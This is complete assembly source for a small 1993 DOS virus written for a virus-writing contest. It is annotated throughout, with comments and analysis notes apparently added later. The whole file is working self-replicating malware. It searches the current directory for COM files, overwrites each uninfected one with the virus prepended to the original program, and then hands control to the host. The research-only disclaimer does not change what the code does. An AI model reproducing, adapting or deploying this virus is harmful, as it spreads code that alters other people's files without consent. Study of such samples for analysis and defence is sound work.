;A small (139 byte) virus with minimal required functionality.
;This virus is for research purposes only. Please do not release!
;Please execute it only on a carefully controlled system, and only
;if you know what you're doing!
;An example for
;#######################################################
;# THE FIRST INTERNATIONAL VIRUS WRITING CONTEST #
;# 1 9 9 3 #
;# sponsored by #
;# American Eagle Publications, Inc. #
;#######################################################
;Assemble this file with TASM 2.0 or higher: "TASM LITTLE;"
;Link as "TLINK /T LITTLE;"
;Basic explanation of how this virus works:
;
;The virus takes control when the program first starts up. All of its code is
;originally located at the start of a COM file that has been infected. When
;the virus starts, it takes over a segment 64K above the one where the program
;was loaded by DOS. It copies itself up there, and then searches for an
;uninfected file. To determine if a file is infected, it checks the first two
;bytes to see if they are the same as its first two bytes. It reads the file
;into memory right above where it is sitting (at 100H in the upper segment).
;If not already infected, it just writes itself plus the file it infected back
;out to disk under the same file name. Then it moves the host in the lower
;segment back to offset 100H and executes it.
.model tiny ;Tiny model to create a COM file (cs = ds = ss, single 64K segment)

.code

;DTA definitions
;FIND_FILE below relocates the DTA to ds:0000H (int 21H function 1AH with
;dx = 0) in the upper segment, so these are absolute offsets into that
;segment. 1AH and 1EH are the file-size and file-name fields of the DOS
;find-first/find-next record that functions 4EH/4FH fill in at the DTA.
;Only the low word of the size is ever read (mov cx,[di] in FIND_FILE).
DTA EQU 0000H ;Disk transfer area
FSIZE EQU DTA+1AH ;file size location in file search
FNAME EQU DTA+1EH ;file name location in file search

;COM load offset: DOS loads a .COM image at cs:100H, so every OFFSET used
;below (in particular OFFSET HOST, which the size arithmetic depends on)
;is relative to this origin.
ORG 100H
;******************************************************************************
;The virus starts here.
;
;VIRSTART - entry point of the infected COM image (see END VIRSTART below).
;Entry state relied on but never verified: ds = es = ss = load segment
;(DOS .COM startup) and cx = 0 (see the "we can assume ch=0" note).
;Effect: copies the 8BH (139) byte virus body from ds:100H to the segment
;1000H (64K) above it, at the same offset, then far-returns into FIND_FILE
;in that upper segment. Nothing checks that this memory exists or is free.
;State handed to FIND_FILE: ds = es = upper segment, cx = 0, and
;si = OFFSET HOST (100H + 8BH), which FIND_FILE reads as its buffer address.
;Clobbers: ax, cx, si, di, ds, es, flags.

VIRSTART:
mov ax,ds
add ax,1000H
mov es,ax ;upper segment is this one + 1000H
mov si,100H ;put virus in the upper segment
mov di,si ;at offset 100H
; mov cl,BYTE (OFFSET HOST AND 0FFH) ;can't code this with TASM
mov cl,8BH ;we can assume ch=0 (cl = low byte of OFFSET HOST, i.e. the virus length)
rep movsb ;this will louse the infection up if run under debug!
mov ds,ax ;set ds to high segment
push ds
mov ax,OFFSET FIND_FILE
push ax
retf ;jump to high memory segment (push ds / push ax / retf = far jump to upper:FIND_FILE)
;Now it's time to find a viable file to infect. We will look for any COM file
;and see if the virus is there already.
;
;FIND_FILE / CHECK_FILE / NEXT_FILE - directory scan and infection test.
;Runs in the upper segment with ds = upper segment, si = OFFSET HOST and
;cx = 0 (all left by VIRSTART). Moves the DTA to ds:0000H, then walks the
;matches of COMFILE ('*.COM', any attribute, cx = 3FH) with find-first
;(4EH) / find-next (4FH). For each match it opens the file read/write,
;reads up to FSIZE (low word) bytes to ds:si, and compares the first word
;of the file with the first word of the virus image at [VIRSTART]. Equal
;means "already infected": the file is closed and the scan continues;
;otherwise control goes to INFECT_FILE with bx = open handle, di = FSIZE
;and si = OFFSET HOST. When the search is exhausted (carry from 4EH/4FH)
;CHECK_FILE jumps to ALLDONE.
;Analysis note: the only infection marker checked is that two-byte prefix
;(the encoding of the virus's first instruction, mov ax,ds); COMFILE holds
;no path, so presumably only the current directory is scanned.

FIND_FILE:
xor dx,dx ;move dta to high segment
mov ah,1AH ;so we don't trash the command line
int 21H ;which the host is expecting (default DTA is in the PSP at 80H)
mov dx,OFFSET COMFILE
mov ch,3FH ;search for any file, no matter what attribute (note: cx=0 before this instr)
mov ah,4EH ;DOS search first function
int 21H
CHECK_FILE: jc ALLDONE ;no COM files to infect (also the exit from NEXT_FILE's 4FH)

mov dx,FNAME ;first open the file (name field of the DTA record)
mov ax,3D02H ;r/w access open file, since we'll want to write to it
int 21H
jc NEXT_FILE ;error opening file - quit and say this file can't be used
mov bx,ax ;put file handle in bx, and leave it there for the duration

mov di,FSIZE
mov cx,[di] ;get file size for reading into buffer (low word only)
mov dx,si ;and read file in at HOST in new segment (note si=OFFSET HOST)
mov ah,3FH ;DOS read function
int 21H
mov ax,[si] ;si=OFFSET HOST here (mov leaves CF from int 21H intact for the jc below)
jc NEXT_FILE ;skip file if error reading it

cmp ax,WORD PTR [VIRSTART] ;see if infected already (first word of file vs first word of virus)
jnz INFECT_FILE ;nope, go do it

mov ah,3EH ;else close the file
int 21H ;and fall through to search for another file

NEXT_FILE: mov ah,4FH ;look for another file (find-next, uses the DTA set above)
int 21H
jmp SHORT CHECK_FILE ;and go check it out

COMFILE DB '*.COM',0 ;search pattern for function 4EH (ASCIIZ)
;When we get here, we've opened a file successfully, and read it into memory.
;In the high segment, the file is set up exactly as it will look when infected.
;Thus, to infect, we just rewrite the file from the start, using the image
;in the high segment.
;
;INFECT_FILE - overwrite the open file with [virus body][original file].
;Expects: bx = handle of the file opened read/write in FIND_FILE,
;di = FSIZE (low word of the size from the DTA record), ds = upper segment
;holding the virus at 100H followed by the file image at OFFSET HOST.
;Seeks to offset 0 (function 42H, al = 0 = from start, cx:dx = 0), writes
;FSIZE + (OFFSET HOST - 100H) bytes from ds:100H, closes the handle and
;falls through to ALLDONE with dx = 100H.
;Analysis note: an infected file therefore grows by exactly OFFSET HOST-100H
;= 8BH (139) bytes and begins with the virus's first instruction. No
;date/time functions (57xxH) are called, so the stamp is presumably left to
;whatever DOS does on write.

INFECT_FILE:
xor cx,cx
mov dx,cx ;reset file pointer to start of file
mov ax,4200H
int 21H

mov ah,40H
mov dx,100H
mov cx,WORD PTR [di] ;adjust size of file for infection (di still = FSIZE from FIND_FILE)
add cx,OFFSET HOST - 100H
int 21H ;write infected file

mov ah,3EH ;close the file
int 21H
;The infection process is now complete. This routine moves the host program
;down so that its code starts at offset 100H, and then transfers control to it.
;
;ALLDONE - hand control back to the host in the original (low) segment.
;Reached from INFECT_FILE (dx = 100H) or from CHECK_FILE when the search is
;exhausted. ss still holds the load segment and is used to reset ds and es.
;The DTA is set to dx>>1, which only yields the DOS default of 80H when
;dx = 100H; on the CHECK_FILE paths dx holds other values (verify per path).
;Then the host image is moved from ds:si (si = OFFSET HOST, unchanged since
;VIRSTART) down to es:100H - an overlapping forward copy, safe because the
;destination is below the source - and a far return lands at low:100H.

ALLDONE:
mov ax,ss ;set ds, es to low segment again
mov ds,ax
mov es,ax
push ax ;prep for retf to host (segment half of the far return address)
shr dx,1 ;restore dta to original value
mov ah,1AH ;for compatibility
int 21H
mov di,100H ;prep to move host back to original location
push di ;offset half of the far return address
; mov cx,sp ;move code, but don't trash the stack
; sub cx,si
mov cx,0FE6FH ;hand code the above to save a byte
;0FE6FH = 0FFFAH - 18BH: assumes sp = 0FFFEH at program start less the two
;words pushed above, and si = OFFSET HOST = 18BH; i.e. everything from the
;host up to just below the stack is copied.
rep movsb ;move code
retf ;and return to host
;******************************************************************************
;The host program starts here. This one is a dummy that just returns control
;to DOS.
;
;HOST - placeholder host that this file assembles into. In an infected file
;the original COM program's bytes occupy this position (OFFSET HOST = 18BH,
;8BH bytes after ORG 100H) instead of the two instructions below.
;Terminates via int 21H function 4CH with exit code 0.

HOST:
mov ax,4C00H ;Terminate, error code = 0
int 21H

HOST_END:

;Entry point of the assembled COM image is VIRSTART (offset 100H).
END VIRSTART